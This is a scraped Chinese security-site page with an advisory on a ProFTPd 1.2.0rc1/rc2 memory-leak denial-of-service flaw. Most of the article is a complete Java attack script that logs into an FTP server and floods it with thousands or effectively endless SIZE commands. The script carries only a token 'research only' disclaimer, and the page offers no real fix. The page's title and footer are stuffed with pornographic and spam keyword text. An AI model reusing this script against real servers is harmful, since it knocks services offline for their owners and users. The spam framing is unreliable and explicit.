成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

鴻蒙開發者社區

公眾號矩陣

移動端

視頻課免費課排行榜短視頻直播課軟考學堂

全部課程軟考信創認證華為認證廠商認證 IT技術 PMP項目管理免費題庫

文章資源問答課堂專欄直播

51CTO

鴻蒙開發者社區

51CTO技術棧

51CTO官微

51CTO學堂

51CTO博客

CTO訓練營

鴻蒙開發者社區訂閱號

51CTO軟考

51CTO學堂APP

51CTO學堂企業版APP

鴻蒙開發者社區視頻號

51CTO軟考題庫

賬號設置退出

ProFTPd 遠程拒絕服務漏洞

作者：chendy 2011-03-03 11:26:09

運維系統運維

ProFTPd 遠程拒絕服務漏洞：ProFTPd 是一款非常流行的 FTP 服務器，但是發現它存在一個安全漏洞，允許惡意用戶對它進行拒絕服務攻擊。本文講述的是ProFTPd 遠程拒絕服務漏洞。

　　ProFTPd 遠程拒絕服務漏洞 (APP,缺陷) ：當 ProFTPd 執行 SIZE FTP 命令時會引起內存泄露漏洞。如果發送更多的SIZE 命令將引起拒絕服務攻擊。以下是詳細內容。

　　涉及程序：

　　ProFTPd

　　描述：

　　ProFTPd 內存泄露引起拒絕服務攻擊

　　詳細：

　　ProFTPd 是一款非常流行的 FTP 服務器。發現它存在一個安全漏洞，允許惡意用戶對它進行拒絕服務攻擊。

　　當 ProFTPd 執行 SIZE FTP 命令時會引起內存泄露漏洞，如果發送大約5000次 SIZE FTP 命令到服務器中可能引起 ProFTPd 耗費超過300KB的內存。如果發送更多的SIZE 命令將引起拒絕服務攻擊。

　　以下代碼僅僅用來測試和研究這個漏洞，如果您將其用于不正當的途徑請后果自負

　　*/  
 
　　import java.net.*;  
 
　　import java.io.*;  
 
　　class TCPconnection {  
 
　　public TCPconnection (String hostname, int portnumber) throws Exception {  
 
　　Socket s = doaSocket(hostname, portnumber);  
 
　　br = new BufferedReader (new InputStreamReader (s.getInputStream()));  
 
　　ps = new PrintStream (s.getOutputStream());  
 
　　}  
 
　　public String readLine() throws Exception {  
 
　　String s;  
 
　　try { s = br.readLine(); }  
 
　　catch (IOException ioe) {  
 
　　System.out.println("TCP Error ... it's a little hax0r exception ;-)");  
 
　　throw new Exception ("\nInput Error: I/O Error");  
 
　　}  
 
　　return s;  
 
　　}  
 
　　public void println(String s) {  
 
　　ps.println(s);  
 
　　}  
 
　　private Socket doaSocket(String hostname, int portnumber) throws Exception {  
 
　　Socket s = null;  
 
　　int attempts = 0;  
 
　　while (s == null && attempts   
 
　　try { s = new Socket(hostname, portnumber); }  
 
　　catch (UnknownHostException uhe) {  
 
　　System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");  
 
　　throw new Exception("\nConnection Error: " + "unknown hostname");  
 
　　}  
 
　　catch (IOException ioe) {  
 
　　System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");  
 
　　}  
 
　　attempts++;  
 
　　}  
 
　　if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");  
 
　　else return s; }  
 
　　private final int maxattempts = 5;  
 
　　private BufferedReader br;  
 
　　private PrintStream ps;  
 
　　}  
 
　　class proftpDoS {  
 
　　public static void main(String[] arg) throws Exception {  
 
　　InputStreamReader isr;  
 
　　BufferedReader tcld;  
 
　　String hostnamez, username, password, file, s1, option;  
 
　　int i, j, k;  
 
　　isr = new InputStreamReader(System.in);  
 
　　tcld = new BufferedReader(isr);  
 
　　System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");  
 
　　System.out.println("Code in an attempt to solve Fermat Last's Theoreme");  
 
　　hostnamez = "";  
 
　　while (hostnamez.length()==0) {  
 
　　System.out.print("Please enter the hostname/IP: ");  
 
　　hostnamez = tcld.readLine(); }  
 
　　username = "";  
 
　　while (username.length()==0) {  
 
　　System.out.print("Enter the username: ");  
 
　　username = tcld.readLine(); }  
 
　　password = "";  
 
　　while (password.length()==0) {  
 
　　System.out.print("Enter the password for that username: ");  
 
　　password = tcld.readLine(); }  
 
　　file = "";  
 
　　while (file.length()==0) {  
 
　　System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");  
 
　　file = tcld.readLine(); }  
 
　　System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");  
 
　　System.out.println("1) Request 10000 size's to the server (it may be enough)");  
 
　　System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");  
 
　　System.out.print("Option: ");  
 
　　option = tcld.readLine();  
 
　　k = Integer.parseInt(option);  
 
　　while (!(k==1 || k==2)) {  
 
　　System.out.print("Option not valid, please try again: ");  
 
　　option = tcld.readLine();  
 
　　k = Integer.parseInt(option); }  
 
　　TCPconnection tc = new TCPconnection(hostnamez, 21);  
 
　　tc.println("user " + username);  
 
　　tc.println("pass " + password);  
 
　　if (k==1) {  
 
　　for(i=0;i<10000;i++)  
 
　　tc.println("size " + file); }  
 
　　else if (k==2) {  
 
　　for(i=1;i<100;i++)  
 
　　for(j=2;j<((int)Math.pow(j,i ));j++)  
 
　　tc.println("size " + file); }  
 
　　tc.println("quit");  
 
　　s1 = tc.readLine();  
 
　　while (s1!=null) {  
 
　　s1 = tc.readLine();  
 
　　System.out.println("Attack completed ... as one of my friends says:");  
 
　　System.out.println("Hack just r0cks ;-)");  
 
　　}  
 
　　}  
 
　　}

　　受影響的系統：

　　ProFTPd 1.2.0rc1

　　ProFTPd 1.2.0rc2

　　解決方案：

　　CNNS 為您提供完善的網絡安全服務。

【編輯推薦】

Proftpd 建表
Proftpd的結構
Proftpd常用參數說明
Proftpd配置之本地用戶

責任編輯：zhaolei 來源： CSDN

51CTO技術棧公眾號

業務
速覽

媒體

51CTO CIOAge HC3i

社區

51CTO博客鴻蒙開發者社區 AI.x社區

教育

51CTO學堂精培企業培訓 CTO訓練營

主站蜘蛛池模板：国产在线激情视频 | 欧美精品一区二区在线观看 | 日韩一区二区三区在线 | 久久精品这里精品 | 紧缚调教一区二区三区视频 | 午夜视频一区二区 | 亚洲国产精品久久 | 日日噜噜噜夜夜爽爽狠狠视频, | 精品视频在线播放 | 国产精品久久午夜夜伦鲁鲁 | 精品久久久久久久久亚洲 | 色必久久 | 一区二区三区成人 | 美女一区二区在线观看 | 综合欧美亚洲 | 国产在线观看一区二区 | 免费看的av | av在线成人| 亚洲成人精品国产 | 91大神新作在线观看 | 久久综合久色欧美综合狠狠 | 97人人澡人人爽91综合色 | 欧美日韩久久精品 | 中文二区 | 成人午夜电影在线观看 | 一级欧美日韩 | 日韩精品1区2区3区爱爱综合网 | 69亚洲精品 | 欧美在线视频观看 | 欧美阿v| 欧美三级免费观看 | 精品无码久久久久久久动漫 | 国产xxxx在线 | 国产精品一二区 | av网站免费看 | 亚洲国产中文在线 | 综合二区 | 国产精品免费av | 亚洲欧美日韩中文在线 | 在线免费观看毛片 | 中文字幕乱码一区二区三区 |